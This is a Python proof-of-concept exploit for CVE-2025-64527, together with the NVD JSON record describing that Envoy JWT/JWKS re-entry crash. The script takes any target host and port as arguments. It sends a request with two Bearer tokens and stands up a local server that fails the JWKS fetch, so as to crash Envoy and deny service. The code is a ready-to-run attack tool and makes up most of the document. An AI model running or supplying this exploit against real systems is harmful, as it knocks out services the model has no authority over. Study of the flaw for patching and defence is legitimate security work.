CVE-2025-64527

#!/usr/bin/env python3 """ CVE-2025-64527 PoC - Envoy JWT JWKS Fetch Failure DoS This PoC demonstrates the re-entry bug in JwksFetcherImpl that causes Envoy crash when multiple JWT tokens are present and JWKS fetch fails. Usage: 1. Setup Envoy with JWT authentication and remote JWKS 2. Configure allow_missing_or_failed: true 3. Block or make JWKS endpoint unreachable 4. Send request with multiple JWT tokens """ import http.server import socketserver import threading import time # Malicious JWT tokens (any malformed tokens will trigger JWKS fetch) MALICIOUS_TOKENS = [ "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.signature1", "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IlNhbiBMYWJvcmEiLCJpYXQiOjE1MTYyMzkwMjJ9.signature2" ] def create_malicious_request(target_host, target_port): """Create HTTP request with multiple JWT tokens to trigger the bug""" request = f"""GET /protected-resource HTTP/1.1 Host: {target_host}:{target_port} Authorization: Bearer {MALICIOUS_TOKENS[0]} Authorization: Bearer {MALICIOUS_TOKENS[1]} User-Agent: CVE-2025-64527-PoC Accept: */* """ return request.encode() def block_jwks_requests(server_host="127.0.0.1", server_port=8080): """Block JWKS requests to simulate fetch failure""" class BlockingHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): if "/.well-known/jwks.json" in self.path: # Return error to trigger onJwksError callback self.send_response(500) self.end_headers() self.wfile.write(b'{"error": "Internal Server Error"}') else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Suppress logging with socketserver.TCPServer((server_host, server_port), BlockingHandler) as httpd: httpd.handle_request() def exploit(target_host, target_port): """Send malicious request to trigger Envoy crash""" import socket # Start JWKS blocking server in background blocker_thread = threading.Thread(target=block_jwks_requests) blocker_thread.daemon = True blocker_thread.start() time.sleep(0.5) # Send malicious request try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) sock.send(create_malicious_request(target_host, target_port)) response = sock.recv(4096) sock.close() print(f"[+] Request sent. Envoy may crash.") print(f"[*] Response: {response[:200]}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_host> <target_port>") sys.exit(1) exploit(sys.argv[1], int(sys.argv[2]))

{"cve": {"id": "CVE-2025-64527", "sourceIdentifier": "[email protected]", "published": "2025-12-03T18:15:46.863", "lastModified": "2025-12-05T16:56:40.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy crashes when JWT authentication is configured with the remote JWKS fetching, allow_missing_or_failed is enabled, multiple JWT tokens are present in the request headers and the JWKS fetch fails. This is caused by a re-entry bug in the JwksFetcherImpl. When the first token's JWKS fetch fails, onJwksError() callback triggers processing of the second token, which calls fetch() again on the same fetcher object. The original callback's reset() then clears the second fetch's state (receiver_ and request_) which causes a crash when the async HTTP response arrives."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.13", "matchCriteriaId": "B303FFFE-9973-4E7E-8A8C-DE847B725534"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.11", "matchCriteriaId": "4419A82D-995F-4DD0-BAE1-3825791245D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.7", "matchCriteriaId": "C50E067C-AE0D-4B14-A442-53603039EFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.3", "matchCriteriaId": "B39C3DF2-E73F-4B66-9504-C24E329ACB54"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-mp85-7mrq-r866", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}